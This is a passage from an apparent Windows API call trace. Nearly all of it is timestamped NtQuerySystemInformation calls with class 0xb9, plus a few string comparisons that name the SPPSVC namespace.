Length=0x50, ResultLength=0x0) [0238.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0238.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0238.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0238.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0238.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0238.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0238.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0238.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0238.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0238.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0238.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0238.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0238.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0238.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0238.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0238.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0238.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0238.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0238.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0238.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0238.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0238.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e840, Length=0x28, ResultLength=0x0) [0238.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0238.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0238.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e820, Length=0x20, ResultLength=0x0) [0238.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0238.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0238.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0238.672] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0238.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0238.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0238.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0238.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0238.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0238.682] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0238.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0238.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0238.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0238.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0238.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0238.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0238.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0238.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0238.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0238.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.695] NtQuerySystemInformation (SystemInformationClass=0xb9, 